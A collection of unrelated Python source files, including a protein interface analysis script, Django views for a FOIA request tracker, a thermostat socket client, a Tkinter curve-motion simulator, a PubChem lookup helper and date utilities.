print('\nPDB Name,charged atom chain,charged atom resID,charged atom residue,charged atom symbol,charged atom depth,charge,hydrophobic atom chain,hydrophobic atom resID,hydrophobic atom residue,hydrophobic atom symbol', file=electro_hydro_res)
for pdbName, chains in pdbsNamesToChains.items():
if pdbName[0:4] not in pdbsNamesToChains: continue
pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName)
pdb = PDBReader.readFile(pdb_path, chains)
interfaceAtoms = getInterfaceAtoms(cursor, pdb)
depthDistances = residue_depth(pdbName[:4], interfaceAtoms, pdb_path, UseInterfaceAtoms=True)
intra_hydrophobic_charged_interactions = electrostat.calcIntraElectroHydrophobic(pdb, interfaceAtoms, depthDistances)
for charged_atom, depth, charge, hydrophobic_atom in intra_hydrophobic_charged_interactions:
print(','.join([pdbName, charged_atom.chain, str(charged_atom.resId), charged_atom.residue, charged_atom.symbol, str(depth), charge, hydrophobic_atom.chain, str(hydrophobic_atom.resId), hydrophobic_atom.residue, hydrophobic_atom.symbol]), file=electro_hydro_res)
if os.path.exists(os.path.join(RESULTS_DIR, 'cavity_vol.csv')):
print('Skipping cavity calculations since file already exists.')
if not os.path.exists(os.path.join(RESULTS_DIR, 'cavity_vol.csv')):
print('Approximating cavities/gaps volume by monte carlo')
with open(os.path.join(RESULTS_DIR, 'cavity_vol.csv'), 'w') as cavity_res:
print('PDB,cavity_vol', file=cavity_res)
pdbs = os.listdir(PDBS_DIR)
for pdbName in pdbs:
if pdbName[0:4] not in pdbsNamesToChains: continue
pdb = PDBReader.readFile(os.path.join(PDBS_DIR, pdbName), pdbsNamesToChains[pdbName[0:4]])
interfaceAtoms = getInterfaceAtoms(cursor, pdb)
cavities_vol_approx = calculateVolume(pdb, interfaceAtoms)
print('%s,%f' % (pdb.name, cavities_vol_approx), file=cavity_res)
if os.path.exists(os.path.join(RESULTS_DIR, 'residue_depth.csv')):
print('Skipping residue depth calculations since file already exists.')
if not os.path.exists(os.path.join(RESULTS_DIR, 'residue_depth.csv')):
print('Calculating Residue Depth')
pdbs = os.listdir(PDBS_DIR)
with open(os.path.join(RESULTS_DIR, 'residue_depth.csv'), 'w') as res_depth:
print('PDB,chain,resId,residue,atom symbol,atom depth', file=res_depth)
for pdbName in pdbs:
if pdbName[0:4] not in pdbsNamesToChains: continue
pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName[:4])
pdb = PDBReader.readFile(pdb_path, pdbName[:4])
depthDistances = residue_depth(pdbName[:4], pdb.atoms, pdb_path)
for atom, dist in depthDistances:
print(','.join([pdbName[:4], atom.chain, str(atom.resId), atom.residue, atom.symbol, str(dist)]), file=res_depth)
cursor.close()
conn.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Setup/download protein database based on PDB")
parser.add_argument("pdbList", help="A file with a list of PDB to download")
parser.add_argument("--folder", help="Name of the folder to contain downloaded files")
parser.add_argument("--dbName", help="Name of the database to create.")
args = parser.parse_args()
if args.pdbList is None:
sys.exit("Please provide a file with list of PDBs to anaylze")
WORKING_DIRECTORY = args.folder if args.folder is not None else os.path.dirname(os.path.abspath(args.pdbList))
print('WORKING DIR: %s' % WORKING_DIRECTORY)
PDBS_DIR = os.path.join(WORKING_DIRECTORY, 'pdbs')
pdbReader.PDBS_DIR = PDBS_DIR
RESULTS_DIR = os.path.join(WORKING_DIRECTORY, 'results')
for dir in [PDBS_DIR, RESULTS_DIR]:
if not os.path.exists(dir):
os.mkdir(dir)
pdbsToAnalyzeWithChains = [pdb.strip().upper().split("_") for pdb in open(args.pdbList, 'r') if
pdb[0:1] != '#'] # todo: add treatment for chains specificatin instad of [0:4]
pdbsToAnalyze = [pdb[0] for pdb in pdbsToAnalyzeWithChains]
download_DB(pdbsToAnalyze) # download from PDB bank and add hydrogens
createInterfaceCSV(pdbsToAnalyzeWithChains) # define interface by distance and by asa
print('''The script will now create DB. DB is required for extra calculations
including VDW and hydrogen bonds
''')
try:
if args.dbName:
DBConfig.DB_NAME = args.dbName
DBConfig.init_connection()
createDataBase(pdbsToAnalyzeWithChains)
# post database creation scripts
fillInterfacePeriphrial(pdbsToAnalyzeWithChains)
calcEnergyTerms(pdbsToAnalyzeWithChains)
except KeyboardInterrupt:
print('DB will not be created. Use ./results table to see the results')
|
nilq/baby-python
|
python
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, Http404, JsonResponse
from .models import Foia, Agency, Tag, SpecialPerson
from django.dispatch import receiver
from django.db.models.signals import pre_save
from django.contrib.auth.models import User
from datetime import date
from django.contrib.auth.decorators import login_required
from django.contrib.postgres.search import SearchQuery, SearchRank, SearchVector
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.conf import settings
from datetime import datetime
@receiver(pre_save, sender=User)
def prepare_user(sender, instance, **kwargs):
if instance._state.adding is True:
## Don't add users not from the nytimes.com email domain.
## or a few whitelisted emails for testing.
if settings.USE_ALLAUTH:
if instance.email and settings.ALLOWABLE_LOGIN_DOMAIN and not instance.email.split('@')[1] == settings.ALLOWABLE_LOGIN_DOMAIN:
raise Http404('Please login with your {} email address.'.format(ALLOWABLE_LOGIN_DOMAIN))
instance.is_staff = True
instance.is_superuser = True
# you may want to have the front-page of the site (listing all the foias)
# require you to log in to see it.
# if so, just uncomment this.
# @login_required()
def index(request):
latest_foias = sorted(Foia.objects.order_by('-filed_date')[:50], key=lambda f: f.sort_order())
if request.user.is_anonymous:
my_foias = []
else:
my_foias = sorted(Foia.objects.filter(reporter=request.user), key=lambda f: f.sort_order())
my_foias_set = set(my_foias)
project_foias = []
try:
if not request.user.is_anonymous and request.user.specialperson.default_project:
project_foias = sorted(Foia.objects.filter(tags=request.user.specialperson.default_project), key=lambda f: f.sort_order())
project_name = request.user.specialperson.default_project.name
except SpecialPerson.DoesNotExist:
pass
# for the dashboard thingy
my_foias_count = len(my_foias_set) if not request.user.is_anonymous else 0
all_foias_count = Foia.objects.count()
percent_overdue = "TK" #Foia.objects.filter(reporter=request.user).count() / ??
percent_complete = int(float(Foia.objects.filter(received_response=True).filter(response_satisfactory=True).count())/all_foias_count*100) if not all_foias_count == 0 else "n/a"
latest_foias = [item for item in latest_foias if item not in my_foias_set]
return render(request, 'foias/index.html',
{'latest_foias': latest_foias,
'my_foias': my_foias,
'project_foias': project_foias,
'warn_about_holidays': date.today()>date(2020, 11, 1),
'my_foias_count': my_foias_count,
'all_foias_count': all_foias_count,
'percent_overdue': percent_overdue,
'percent_complete': percent_complete,
})
def project(request, tag_id):
project_name = Tag.objects.get(id=tag_id).name
project_foias = sorted(Foia.objects.filter(tags__id=tag_id), key=lambda f: f.sort_order())
return render(request, 'foias/project.html',
{
'project_foias': project_foias,
'project_name': project_name,
'warn_about_holidays': date.today()>date(2020, 11, 1),
})
def addten(request):
days_to_add = 10
date_str = request.GET["date"]
date = datetime.strptime(date_str, "%Y-%m-%d")
f = Foia()
new_date = f.cal.addbusdays(date, days_to_add).date()
return JsonResponse({'old_date':date, 'new_date': new_date, 'days_added': days_to_add})
def healthcheck(request):
return HttpResponse('', content_type="text/plain", status=200)
def all(request):
"""this page lists ALL the requests and is probably best for the lawyers or whoever"""
result_foias = Foia.objects.all()
paginator = Paginator(result_foias, 25)
page = request.GET.get('page')
try:
result_foias = paginator.page(page)
except PageNotAnInteger:
result_foias = paginator.page(1)
except EmptyPage:
result_foias = paginator.page(paginator.num_pages)
return render(request, 'foias/all.html', {'result_foias': result_foias})
# full text search method.
def search(request):
query_string = request.GET['q']
query = SearchQuery(query_string, config='simple')
vector = SearchVector('reporter__first_name', 'reporter__last_name', 'agency__name',
'request_subject', 'request_notes', 'request_number', 'submission_notes',
'response_notes', 'response_url', 'lawsuit_notes', config='simple' )
res = Foia.objects.annotate(rank=SearchRank(vector, query), search=vector).filter(search=query_string).order_by('-rank')[:50]
return render(request, 'foias/search.html', {'result_foias': res, 'query': query_string })
# # this is not implemented!
# but if you wanted a page for showing details of a FOIA other than the edit page, this would be where to do it.
# you'd also have to change foias/urls.py
# def detail(request, foia_id):
# foia = get_object_or_404(Foia, pk=foia_id)
# return render(request, 'foias/detail.html', {'foia': foia})
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# Marcus de Assis Angeloni <marcus.angeloni@ic.unicamp.br>
# Rodrigo de Freitas Pereira <rodrigodefreitas12@gmail.com>
# Helio Pedrini <helio@ic.unicamp.br>
# Wed 6 Feb 2019 13:00:00
from __future__ import division
import tensorflow as tf
import os
import csv
import numpy as np
import sys
import argparse
from datetime import datetime
from tqdm import tqdm
# read the list file from protocol and return the trials and respective ground truth
def list_images(list_file):
trials = []
ground_truth = []
with open(list_file, 'r') as csvfile:
reader = csv.reader(csvfile, delimiter = " ")
for row in reader:
trials.append(row[0])
ground_truth.append(int(row[1]))
return trials, np.array(ground_truth)
#################
# main block
#################
# Get arguments
parser = argparse.ArgumentParser(description = 'Predict and compute metrics of a fold from ADIENCE Dataset')
parser.add_argument('facialparts_dir', default = '', help = 'Full path of facial parts images')
parser.add_argument('protocol_dir', default = '', help = 'Full path of protocol files')
parser.add_argument('model_path', default = '', help = 'Full path of CNN trained model')
parser.add_argument('fold', default='', help = 'Fold number [0-4]')
args = parser.parse_args()
if (not(os.path.exists(args.facialparts_dir))):
print('Facial parts images (\"' + args.facialparts_dir + '\") not found.')
exit()
if (not(os.path.exists(args.protocol_dir))):
print('Protocol files (\"' + args.model_path + '\") not found.')
exit()
if (not(os.path.exists(args.model_path))):
print('Model (\"' + args.model_path + '\") not found.')
exit()
if (int(args.fold) < 0 or int(args.fold) > 4):
print('Fold (\"' + args.fold + '\") not supported.')
exit()
model_path = args.model_path
fold = args.fold
protocol_dir = args.protocol_dir
facialparts_dir = args.facialparts_dir
print(datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - Prediction started")
print("Model path: " + model_path)
print("Fold: " + fold)
# list file with test trials
test_path = os.path.join(protocol_dir,"test_fold_is_" + str(fold), "age_test.txt")
trials, ground_truth = list_images(test_path)
# trained model
model = tf.contrib.predictor.from_saved_model(model_path)
pred = []
for trial in tqdm(trials):
# load facial parts
with open(os.path.join(facialparts_dir, "eyebrows", trial), 'rb') as f:
eyebrows_bytes = f.read()
with open(os.path.join(facialparts_dir, "eyes", trial), 'rb') as f:
eyes_bytes = f.read()
with open(os.path.join(facialparts_dir, "nose", trial), 'rb') as f:
nose_bytes = f.read()
with open(os.path.join(facialparts_dir, "mouth", trial), 'rb') as f:
mouth_bytes = f.read()
# inference
predict = model({'eyebrows':[eyebrows_bytes], 'eyes':[eyes_bytes], 'nose':[nose_bytes], 'mouth':[mouth_bytes]})
pred.append(predict['softmax'][0].argmax())
# metrics
pred = np.array(pred)
np.savetxt(os.path.join(protocol_dir, str(fold) + "predictions.txt"), pred)
correct = (pred == ground_truth)
correct_1off = (np.abs(pred - ground_truth) <= 1)
print("Total trials: " + str(correct.size))
print("Accuracy: " + str(float(correct.sum()) / correct.size))
print("Accuracy 1-off: " + str(float(correct_1off.sum()) / correct_1off.size))
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import mcp9600
import time
from prometheus_client import start_http_server, Gauge
m = mcp9600.MCP9600()
m.set_thermocouple_type('K')
# Apparently the default i2c baudrate is too high you need to lower it:
# set the followig line in the Pi's /boot/config.txt file
# dtparam=i2c_arm=on,i2c_arm_baudrate=40000
# Source:
# https://forums.pimoroni.com/t/mcp9600-breakout-pim437/13129/3
# https://www.raspberrypi-spy.co.uk/2018/02/change-raspberry-pi-i2c-bus-speed/
start_http_server(8002)
hotGauge = Gauge('roomon_mcp9600_hot_temp', 'Temperature at hot junction of thermocouple in C')
coldGauge = Gauge('roomon_mcp9600_cold_temp', 'Temperature at cold junction of thermocouple in C')
while True:
t = m.get_hot_junction_temperature()
c = m.get_cold_junction_temperature()
d = m.get_temperature_delta()
if t > -10:
hotGauge.set(t)
coldGauge.set(c)
print(t, c, d)
time.sleep(10)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 26 18:16:22 2019
@author: johncanty
"""
import socket
import re
def wifistat_send(ip, port, command):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(command)
data = s.recv(1024)
s.close()
sdata = data.decode('utf-8')
return sdata
def login(ip, port, password):
command = str('*GUP' + password + '*L_I')
response = str(wifistat_send(ip, port, str.encode(command)))
if re.search("(sucessfully)", response) is not None:
seccode = str(re.findall('(\d{4})', response))
else:
seccode = 666
seccode = seccode.strip("['']")
return seccode
def send_schedule(ip, port, seccode, day, schedule):
command = str(day + ';' + schedule + ':' + seccode + '*W_S')
response = str(wifistat_send(ip, port, str.encode(command)))
if re.search("(W_S1)", response) is not None:
status = 0
else:
status = 1
return status
def set_time(ip, port, seccode, time):
command = str(time + ':' + seccode + '*S_T')
response = str(wifistat_send(ip, port, str.encode(command)))
if re.search("(S_T1)", response) is not None:
status = 0
else:
status = 1
return status
# Get the security code from the thermostat. This is usually a 4 digit number that lets the thermostat
# Know that you have logged in sucessfully.
#seccode = str(login('10.10.11.54', int(8899), 'test'))
# Send a schedule to the thermostat
#W,6,0,67,70; W is wake The first digit is the Hour the second the minute Followed by the temp setpoints.
#W - Wake
#L - Leave
#R - Return
#S - Sleep
#To Write a schedule for Friday Day = 6
#W,4,30,67,70;L,7,0,60,65;R,19,0,67,70;S,22,0,60,65
#print(send_schedule('10.10.11.54', int(8899), seccode, '6', 'W,4,30,67,70;L,6,30,60,65;R,19,0,67,70;S,22,0,60,65'))
|
nilq/baby-python
|
python
|
import tkinter as tk
from tkinter import *
import time
import numpy as np
import math
from copy import copy
from RestraintedEOM import MassPointRestraintedCurveSimulator
#canvas空間とシミュレーション空間を分けて考える
#canvas空間をそのままシミュレーションに利用すると扱う数値が大きくて誤差が大きくなるため
class MainForm(tk.Frame):
def __init__(self, master=None, width=500, height=500):
super().__init__(master)
self.master = master
self.pack()
self.window_width = width + 200
self.window_height = height + 50
self.canvas_width = width
self.canvas_height = height
self.initWidgets()
self.ctrl_p_radius = 10
self.is_pick_ctrl_p = False
self.pick_ctrl_p_index = -1
self.is_simu_running = False
self.max_ctrl_p_num = 10
self.is_mouse_on_curve = False
self.select_curve_index = -1
self.dist_mouse_to_curve_th = 0.01#シミュレーション空間上での距離
self.simulator = MassPointRestraintedCurveSimulator()
self.addControlPoint([self.canvas_width - self.ctrl_p_radius, self.canvas_height - self.ctrl_p_radius])
size = str(self.window_width)+"x"+str(self.window_height)
self.master.geometry(size)
def draw_canvas(self):
self.canvas.delete("line")
self.canvas.delete("ctrl_p")
self.canvas.delete("mass_point")
self.draw_curve()
self.draw_ctrl_p()
def draw_curve(self):
points = self.simulator.spline.sampling(10)
if self.is_mouse_on_curve:
color = "green"
else:
color = "black"
for i in range(len(points)-1):
self.canvas.create_line(points[i][0]*self.canvas_width, points[i][1]*self.canvas_height, points[i+1][0]*self.canvas_width, points[i+1][1]*self.canvas_height, tag="line", fill=color, width=5)
def draw_ctrl_p(self):
ctrl_ps = self.simulator.spline.control_points
color = "red"
for p in reversed(ctrl_ps):
p[0] *= self.canvas_width
p[1] *= self.canvas_height
self.canvas.create_oval(p[0]-self.ctrl_p_radius, p[1]-self.ctrl_p_radius, p[0]+self.ctrl_p_radius, p[1]+self.ctrl_p_radius, fill=color, tag="ctrl_p")
color = "blue"
def addControlPoint(self, point):
if len(self.simulator.spline.control_points) - 1 >= self.max_ctrl_p_num:
return
point_copy = copy(point)
point_copy[0] /= self.canvas_width
point_copy[1] /= self.canvas_height
self.simulator.spline.addControlPoint(point_copy)
self.draw_canvas()
#先頭に挿入する
def insertControlPoint(self, point, index):
if len(self.simulator.spline.control_points) - 1 >= self.max_ctrl_p_num:
return
point_copy = copy(point)
point_copy[0] /= self.canvas_width
point_copy[1] /= self.canvas_height
self.simulator.spline.insertControlPoint(point_copy, index)
self.draw_canvas()
def pickCtrl(self, point_on_canvas):
control_points = self.simulator.spline.control_points
for index in range(len(control_points)-1): #最後の制御点は移動させない
point = control_points[index]
dx = point_on_canvas[0] - self.canvas_width*point[0]
dy = point_on_canvas[1] - self.canvas_height*point[1]
if (dx**2 + dy**2)< self.ctrl_p_radius**2:
return index
return -1
def onLeftClick(self, evt):
if self.is_simu_running:
return
self.pick_ctrl_p_index = self.pickCtrl([evt.x, evt.y])
if self.pick_ctrl_p_index >= 0:
return
if self.is_mouse_on_curve:
self.insertControlPoint([evt.x, evt.y], self.select_curve_index)
else :
self.insertControlPoint([evt.x, evt.y], 0)
def onRightClick(self, evt):
if self.is_simu_running:
return
control_points = self.simulator.spline.control_points
for index in range(len(control_points)-1): #最後の制御点は消させない
point = control_points[index]
dx = evt.x - point[0] * self.canvas_width
dy = evt.y - point[1] * self.canvas_height
if (dx**2 + dy**2)< self.ctrl_p_radius**2:
self.simulator.spline.removeControlPoint(index)
self.draw_canvas()
break
def startSimulation(self):
ctrl_ps = self.simulator.spline.control_points
#制御点の数が2個未満のとき(曲線が生成されていないとき)は何もしない
if len(ctrl_ps) < 2:
return
self.start_btn.config(state="disable")
self.is_simu_running = True
start_point = ctrl_ps[0]
norm = self.simulator.spline.getDifferentialValue(0)
norm = norm[0]**2 + norm[1]**2
E = 0.01 #わずかに画面外に出れるようなエネルギーを与える
U = -9.80665 * start_point[1]
V = np.sqrt(2*(E-U)/norm)
domain_of_def = [0, len(ctrl_ps) - 1]
dt = 0.001
init_condition = [0, V]
#時間の単位は秒で統一
sec_per_frame = 1/30
elapsed_time = 0
update_speed = 16
while(True):
if not(self.is_simu_running):
break
start_loop = time.perf_counter()
for i in range(update_speed):
_, solve = self.simulator.timeDevelop([elapsed_time, elapsed_time+dt], init_conditions=init_condition)
s = solve[0][len(solve[0])-1]
elapsed_time += dt
#曲線の外に出ようとしたら座標を押し戻して速度を反転
if s < domain_of_def[0]:
s = domain_of_def[0]
solve[1][len(solve[1])-1] *= -1
elif s > domain_of_def[1]:
s = domain_of_def[1]
solve[1][len(solve[1])-1] *= -1
break
init_condition=[solve[0][len(solve[0])-1], solve[1][len(solve[1])-1]]
p = self.simulator.spline.getValue(s)
p[0] = int(p[0] * self.canvas_width)
p[1] = int(p[1] * self.canvas_height)
self.canvas.delete("mass_point")
self.canvas.create_oval(p[0]-self.ctrl_p_radius, p[1]-self.ctrl_p_radius, p[0]+self.ctrl_p_radius, p[1]+self.ctrl_p_radius, fill="green", tag="mass_point")
self.canvas.update()
if time.perf_counter() - start_loop < sec_per_frame:
time.sleep((sec_per_frame - (time.perf_counter() - start_loop))/1.1)
else:
print("処理落ち")
self.elapsed_time_label["text"] = "{:.3f}".format(elapsed_time)
if s == domain_of_def[1]:
break
self.is_simu_running = False
self.start_btn.config(state="normal")
def stopSimulation(self):
self.is_simu_running = False
def clearCtrlPs(self):
if self.is_simu_running:
return
ctrl_ps = self.simulator.spline.control_points
for i in range(len(ctrl_ps)-1):
self.simulator.spline.removeControlPoint(0)
self.draw_canvas()
def onRelease(self, evt):
self.pick_ctrl_p_index = -1
def onDragg(self, evt):
if self.is_simu_running:
return
if self.pick_ctrl_p_index < 0:
return
if evt.x < 0 or evt.y < 0 or evt.x > self.canvas_width or evt.y > self.canvas_height:
return
point = [evt.x/self.canvas_width, evt.y/self.canvas_height]
self.simulator.spline.moveControlPoint(point, self.pick_ctrl_p_index)
self.draw_canvas()
def leave(self, evt):
self.pick_ctrl_p_index = -1
def mouseMove(self, evt):
action = (lambda: 0)
point = [evt.x/self.canvas_width, evt.y/self.canvas_height]
d, point, param, min_dist_curve_index = self.simulator.spline.calcDistPointToSpline(point)
th = 0.00001
if d < th:
if not(self.is_mouse_on_curve):
action = self.draw_canvas
self.is_mouse_on_curve = True
self.select_curve_index = min_dist_curve_index + 1
else:
if self.is_mouse_on_curve:
action = self.draw_curve
self.is_mouse_on_curve = False
action()
def initWidgets(self):
self.canvas = tk.Canvas(self, width=self.canvas_width, height=self.canvas_height, bd=2, bg="white")
self.canvas.grid(column=0,row=0, rowspan=10)
self.elapsed_time_label = tk.Label(self, text="0.000", width=10, font=("", 20))
self.elapsed_time_label.grid(column=1, row=4)
self.start_btn = tk.Button(self, text="スタート", bd=2, width=20, command=self.startSimulation)
self.start_btn.grid(column=1, row=5)
self.stop_btn = tk.Button(self, text="ストップ", bd=2, width=20, command=self.stopSimulation)
self.stop_btn.grid(column=1, row=6)
self.clear_ctrlps_btn = tk.Button(self, text="曲線クリア", bd=2, width=20, command=self.clearCtrlPs)
self.clear_ctrlps_btn.grid(column=1, row=7)
self.canvas.bind("<ButtonPress-1>", self.onLeftClick)
self.canvas.bind("<ButtonPress-3>", self.onRightClick)
self.canvas.bind("<ButtonRelease-1>", self.onRelease)
self.canvas.bind("<B1-Motion>", self.onDragg)
self.canvas.bind("<Motion>", self.mouseMove)
self.canvas.bind("<Leave>", self.leave)
root = tk.Tk()
root.title("ParticleConstrainedOnCurve")
form = MainForm(root, 1200, 600)
form.mainloop()
|
nilq/baby-python
|
python
|
import sys
t = int(sys.stdin.readline())
MOD = 1000000007
def expo(a,b):
result = 1;
while(b):
if(b&1):
result = (result*a)%MOD
a = (a*a)%MOD
b = b/2
return result
while(t>0):
s = sys.stdin.readline().split(' ')
a = int(s[0])
b = int(s[1])
a %= MOD
print expo(a,b)
t-=1
|
nilq/baby-python
|
python
|
from __future__ import print_function
__author__ = 'Leanne Whitmore'
__email__ = 'lwhitmo@sandia.gov'
__description__ = 'Gets InChis for compounds in database'
import re
import httplib
import urllib2
import pubchempy as pcp
class CompoundTranslator(object):
""" Converts compound IDs to their InChi"""
def translate(self, compound_name):
'''
Retrieve InChi\'s for compounds
'''
cas_value = 'None'
compound_name = re.sub('\_\w{1}0$', '', compound_name)
compound_name = re.sub('_', ' ', compound_name)
self.get_inchi(compound_name)
if len(self.IDs) == 0:
compound_name = re.sub(' ', '-', compound_name)
self.get_inchi(compound_name)
if len(self.IDs) == 0:
compound_name = compound_name+'+'
self.get_inchi(compound_name)
if len(self.IDs) == 0:
compound_name = compound_name+'-'
self.get_inchi(compound_name)
if len(self.IDs) > 0:
allsynomyms = self.IDs[0].synonyms
for syn in allsynomyms:
if syn.startswith('CAS'):
cas_value = re.sub('CAS-', '', syn)
return(self.IDs[0].inchi, self.IDs[0].iupac_name, cas_value)
else:
return(None, None, cas_value)
def get_inchi(self, compound_name):
'''Attempt to get inchi for a compound'''
try:
self.IDs = pcp.get_compounds(compound_name, 'name')
except (pcp.PubChemHTTPError, httplib.BadStatusLine, urllib2.URLError, ValueError):
self.IDs = []
print ('WARNING: could not get info for {}...Errored out'.format(compound_name))
|
nilq/baby-python
|
python
|
from unittest import TestCase
from lib.query_executor.connection_string.sqlalchemy import (
_get_sqlalchemy_create_engine_kwargs,
)
class CreateEngineKwargsTestCase(TestCase):
def test_empty(self):
self.assertEqual(_get_sqlalchemy_create_engine_kwargs({}), ("", {}))
self.assertEqual(
_get_sqlalchemy_create_engine_kwargs({"connection_string": "foobar"}),
("foobar", {}),
)
self.assertEqual(
_get_sqlalchemy_create_engine_kwargs(
{"connection_string": "foobar", "connect_args": []}
),
("foobar", {}),
)
def test_simple_connect_args(self):
self.assertEqual(
_get_sqlalchemy_create_engine_kwargs(
{
"connection_string": "foobar",
"connect_args": [
{"key": "foo", "value": "bar", "isJson": False},
{"key": "hello", "value": "world"},
],
}
),
("foobar", {"foo": "bar", "hello": "world"}),
)
self.assertEqual(
_get_sqlalchemy_create_engine_kwargs(
{
"connection_string": "foobar",
"connect_args": [
{"key": "foo", "value": "bar", "isJson": False},
{"key": "foo", "value": "baz", "isJson": False},
],
}
),
("foobar", {"foo": "baz"}),
)
def test_json_connect_args(self):
self.assertEqual(
_get_sqlalchemy_create_engine_kwargs(
{
"connection_string": "foobar",
"connect_args": [
{"key": "hello", "value": '"world"', "isJson": True},
{"key": "foo", "value": "1", "isJson": True},
{"key": "bar", "value": '["test"]', "isJson": True},
{"key": "baz", "value": '{"a": "b"}', "isJson": True},
],
}
),
(
"foobar",
{"hello": "world", "foo": 1, "bar": ["test"], "baz": {"a": "b"}},
),
)
def test_error_conect_args(self):
self.assertEqual(
_get_sqlalchemy_create_engine_kwargs(
{
"connection_string": "foobar",
"connect_args": [
# Value Missing
{"key": "foo", "isJson": True},
# Key Missing
{"value": "['test']", "isJson": True},
# Invalid JSON
{"key": "baz", "value": "{'a': 'b'}", "isJson": True},
# Still Works
{"key": "hello", "value": '"world"', "isJson": True},
],
}
),
("foobar", {"hello": "world"}),
)
|
nilq/baby-python
|
python
|
def main():
input_file = 'input.txt'
with open(input_file, 'r') as f:
contents = f.read().split(',')
prog = [int(c) for c in contents]
part1_run(prog.copy())
part2_brute_force(prog)
def part1_run(program: list):
program[1] = 12
program[2] = 2
run_program(program)
print(f"position 0: {program[0]}")
def part2_brute_force(program: list):
found = False
for verb in range(len(program)):
if found:
break
for noun in range(len(program)):
n_prog = program.copy()
n_prog[1] = noun
n_prog[2] = verb
try:
run_program(n_prog)
except:
continue
if n_prog[0] == 19690720:
found = True
print(f"noun: {noun}, verb: {verb}")
print(f"answer: {100 * noun + verb}")
break
if not found:
print("part 2 brute force completed without answer")
def run_program(program: list):
try:
index = 0
while index < len(program):
index = run_op(program, index)
except StopIteration:
return
assert False
def run_op(program: list, position: int) -> int:
ops = (1, 2, 99, )
op = program[position]
assert op in ops
if op == 99:
raise StopIteration()
operand_location_1 = program[position + 1]
operand_location_2 = program[position + 2]
destination = program[position + 3]
operand_1 = program[operand_location_1]
operand_2 = program[operand_location_2]
value = operand_1 + operand_2 if op == 1 else operand_1 * operand_2
program[destination] = value
return position + 4
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
""" Date time stuff """
import datetime
import re
import requests
from ics import Calendar
import config
_FIRST_MONTH = 1
_MAX_MONTH = 12
_MONTHS = [
"January",
"February",
"March",
"April",
"June",
"July",
"August",
"September",
"October",
"November",
"December"]
_TURKISH_DATE_LEN = 10
_TURKISH_DATE_REGEX = "[0-3][0-9].[0-1][0-9].[1-2][0-9][0-9][0-9]"
_BANK_HOLIDAY_CALENDAR = None
def equals(date1: datetime.datetime, date2: datetime.datetime):
""" Do both dates equal """
if date1.year == date2.year and date1.month == date2.month and date1.day == date2.day:
return True
return False
def get_first_day_of_month(date: datetime.datetime):
""" First day of month """
year = date.year
month = date.month
return datetime.datetime(year=year, month=month, day=1)
def get_first_day_of_next_month(date: datetime.datetime):
""" First day of next month """
year = date.year
month = date.month
if month == _MAX_MONTH:
year += 1
month = 1
else:
month += 1
return datetime.datetime(year=year, month=month, day=1)
def get_formatted_date(date: datetime.datetime) -> str:
""" Formatted date """
return date.isoformat()[:10]
def get_last_day_of_prev_month(date: datetime.datetime) -> datetime:
""" Last day of previous month """
previous_month = get_previous_month(date)
year = previous_month.year
month = previous_month.month
day = _get_last_day_of_month(month, year)
return datetime.datetime(year=year, month=month, day=day)
def get_last_day_of_month(date: datetime.datetime) -> datetime:
""" Last day of given month """
year = date.year
month = date.month
day = _get_last_day_of_month(month, year)
return datetime.datetime(year=year, month=month, day=day)
def get_mid_day_of_month(date: datetime.datetime):
""" Middle day of month """
year = date.year
month = date.month
return datetime.datetime(year=year, month=month, day=15)
def get_mid_day_of_next_month(date: datetime.datetime):
""" Middle day of next month """
date2 = get_next_month(date)
year = date2.year
month = date2.month
return datetime.datetime(year=year, month=month, day=15)
def get_mid_day_of_next_year(date: datetime.datetime):
""" Middle day of next year """
return get_next_year(get_mid_day_of_year(date))
def get_mid_day_of_year(date: datetime.datetime):
""" Middle day of year """
year = date.year
return datetime.datetime(year=year, month=6, day=15)
def get_month_name(month: int) -> str:
""" Name of given month """
return _MONTHS[month]
def get_months_between_dates(low: datetime.datetime, high: datetime.datetime) -> int:
""" Calculates and returns months between dates """
return (high.year - low.year) * 12 + (high.month - low.month)
def get_next_day(date: datetime.datetime, next_count=1):
""" Tomorrow, tomorrow, I love you, tomorrow """
return date + datetime.timedelta(days=next_count)
def get_next_month(date: datetime, next_count=1):
""" Next month """
next_year = date.year
next_month = date.month + next_count
while next_month > _MAX_MONTH:
next_month -= _MAX_MONTH
next_year += 1
day = _shift_day_to_month(date.day, next_month, next_year)
return datetime.datetime(year=next_year, month=next_month, day=day)
def get_next_week(date: datetime, next_count=1):
""" Next week """
return date + datetime.timedelta(weeks=next_count)
def get_nearest_workday(date: datetime, backwards=False):
""" Nearest workday """
output = date
while output.weekday() == 5 or output.weekday() == 6 or is_bank_holiday(output):
if backwards:
output = get_next_day(output, next_count=-1)
else:
output = get_next_day(output, next_count=1)
return output
def get_next_year(date: datetime, next_count=1):
""" Next year """
return datetime.datetime(date.year+next_count, date.month, date.day)
def get_previous_month(date: datetime) -> datetime:
""" Previous month """
year = date.year
month = date.month
month -= 1
if month == 0:
month = 12
year -= 1
day = _shift_day_to_month(date.day, month, year)
return datetime.datetime(year=year, month=month, day=day)
def get_turkish_date_at_start(line: str) -> datetime.datetime:
""" Turkish formatted """
split_line = line.split(";")
if len(split_line) < 2:
return None
date_part = split_line[0]
date_candidate = date_part.split(".")
if len(date_candidate) < 3:
return None
day_part = str(date_candidate[0])
while len(day_part) < 2:
day_part = "0" + day_part
month_part = str(date_candidate[1])
while len(month_part) < 2:
month_part = "0" + month_part
year_part = str(date_candidate[2])
start_of_line = day_part + "." + month_part + "." + year_part
if not is_turkish_date(start_of_line):
return None
return parse_turkish_date(start_of_line)
def get_two_digit_month(month: int) -> str:
""" Two digit month """
output = str(month)
while len(output) < 2:
output = "0" + output
return output
def is_bank_holiday(date: datetime) -> bool:
""" Is bank holiday """
global _BANK_HOLIDAY_CALENDAR
if _BANK_HOLIDAY_CALENDAR is None:
